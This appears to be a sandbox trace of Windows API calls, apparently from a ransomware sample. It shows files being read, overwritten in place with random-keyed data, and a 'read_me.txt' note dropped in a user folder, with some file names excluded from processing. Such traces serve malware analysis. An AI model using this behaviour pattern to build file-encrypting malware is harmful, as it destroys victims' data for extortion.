[0083.053] GetProcessHeap () returned 0x4f10000 [0083.053] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0083.053] ReadFile (in: hFile=0x8f4, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0083.106] SetFilePointerEx (in: hFile=0x8f4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.106] WriteFile (in: hFile=0x8f4, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0083.106] GetProcessHeap () returned 0x4f10000 [0083.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.106] GetProcessHeap () returned 0x4f10000 [0083.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.106] GetProcessHeap () returned 0x4f10000 [0083.106] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.106] GetProcessHeap () returned 0x4f10000 [0083.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.106] GetProcessHeap () returned 0x4f10000 [0083.106] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.106] GetProcessHeap () returned 0x4f10000 [0083.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.106] GetProcessHeap () returned 0x4f10000 [0083.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.106] GetProcessHeap () returned 0x4f10000 [0083.106] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.106] GetProcessHeap () returned 0x4f10000 [0083.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.106] GetProcessHeap () returned 0x4f10000 [0083.106] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.106] GetProcessHeap () returned 0x4f10000 [0083.106] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.106] GetProcessHeap () returned 0x4f10000 [0083.106] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.106] GetProcessHeap () returned 0x4f10000 [0083.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.107] GetProcessHeap () returned 0x4f10000 [0083.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.108] GetProcessHeap () returned 0x4f10000 [0083.108] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.109] GetProcessHeap () returned 0x4f10000 [0083.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.109] GetProcessHeap () returned 0x4f10000 [0083.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.109] GetProcessHeap () returned 0x4f10000 [0083.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.109] GetProcessHeap () returned 0x4f10000 [0083.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.109] GetProcessHeap () returned 0x4f10000 [0083.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.109] GetProcessHeap () returned 0x4f10000 [0083.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.109] GetProcessHeap () returned 0x4f10000 [0083.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.109] GetProcessHeap () returned 0x4f10000 [0083.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.109] GetProcessHeap () returned 0x4f10000 [0083.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.109] GetProcessHeap () returned 0x4f10000 [0083.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.109] GetProcessHeap () returned 0x4f10000 [0083.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.109] GetProcessHeap () returned 0x4f10000 [0083.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.109] GetProcessHeap () returned 0x4f10000 [0083.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.109] GetProcessHeap () returned 0x4f10000 [0083.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.109] GetProcessHeap () returned 0x4f10000 [0083.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.110] GetProcessHeap () returned 0x4f10000 [0083.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.110] GetProcessHeap () returned 0x4f10000 [0083.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.110] GetProcessHeap () returned 0x4f10000 [0083.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.110] GetProcessHeap () returned 0x4f10000 [0083.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.110] GetProcessHeap () returned 0x4f10000 [0083.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.110] GetProcessHeap () returned 0x4f10000 [0083.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.110] GetProcessHeap () returned 0x4f10000 [0083.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.110] GetProcessHeap () returned 0x4f10000 [0083.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.110] GetProcessHeap () returned 0x4f10000 [0083.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.110] GetProcessHeap () returned 0x4f10000 [0083.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.110] GetProcessHeap () returned 0x4f10000 [0083.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.110] GetProcessHeap () returned 0x4f10000 [0083.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.110] SetFilePointerEx (in: hFile=0x8f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.110] WriteFile (in: hFile=0x8f4, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0083.116] WriteFile (in: hFile=0x8f4, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0083.116] GetProcessHeap () returned 0x4f10000 [0083.117] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0083.117] GetProcessHeap () returned 0x4f10000 [0083.117] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.117] GetProcessHeap () returned 0x4f10000 [0083.117] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.117] CloseHandle (hObject=0x8f4) returned 1 [0083.120] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 95 [0083.196] GetProcessHeap () returned 0x4f10000 [0083.196] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e71148 [0083.197] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\*") returned 32 [0083.197] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24f6c480, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24f6c480, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe8e8 [0083.197] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\.") returned 32 [0083.197] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24f6c480, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24f6c480, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0083.197] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\..") returned 33 [0083.197] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0083.197] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned 42 [0083.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x914 [0083.200] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0083.200] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0083.200] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0083.200] CloseHandle (hObject=0x914) returned 1 [0083.200] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24ed3f00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24ed3f00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Links", cAlternateFileName="")) returned 1 [0083.200] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links") returned 36 [0083.200] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24efa060, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24efa060, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0083.200] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites") returned 49 [0083.200] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24f6c480, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24f6c480, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0083.200] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites") returned 43 [0083.200] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24f6c480, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24f6c480, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24f6c480, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0083.201] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\read_me.txt") returned 42 [0083.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\read_me.txt" (normalized: "c:\\users\\default\\favorites\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x914 [0083.201] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0083.201] CloseHandle (hObject=0x914) returned 1 [0083.201] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0083.201] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live") returned 43 [0083.201] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0083.201] FindClose (in: hFindFile=0x7cfe8e8 | out: hFindFile=0x7cfe8e8) returned 1 [0083.201] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\read_me.txt") returned 42 [0083.201] GetProcessHeap () returned 0x4f10000 [0083.201] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e71148 | out: hHeap=0x4f10000) returned 1 [0083.201] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 104 [0083.201] GetProcessHeap () returned 0x4f10000 [0083.201] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c90050 | out: hHeap=0x4f10000) returned 1 [0083.201] SetFilePointerEx (in: hFile=0x8f8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.201] ReadFile (in: hFile=0x8f8, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0083.201] SetFilePointerEx (in: hFile=0x8f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.201] GetProcessHeap () returned 0x4f10000 [0083.201] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.201] GetProcessHeap () returned 0x4f10000 [0083.201] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.201] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.201] GetProcessHeap () returned 0x4f10000 [0083.201] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0083.202] ReadFile (in: hFile=0x8f8, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x86, lpOverlapped=0x0) returned 1 [0083.204] SetFilePointerEx (in: hFile=0x8f8, liDistanceToMove=0xffffff7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.204] WriteFile (in: hFile=0x8f8, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x86, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x86, lpOverlapped=0x0) returned 1 [0083.204] GetProcessHeap () returned 0x4f10000 [0083.204] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.204] GetProcessHeap () returned 0x4f10000 [0083.204] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.204] GetProcessHeap () returned 0x4f10000 [0083.204] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.204] GetProcessHeap () returned 0x4f10000 [0083.204] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.204] GetProcessHeap () returned 0x4f10000 [0083.204] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.204] GetProcessHeap () returned 0x4f10000 [0083.204] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) 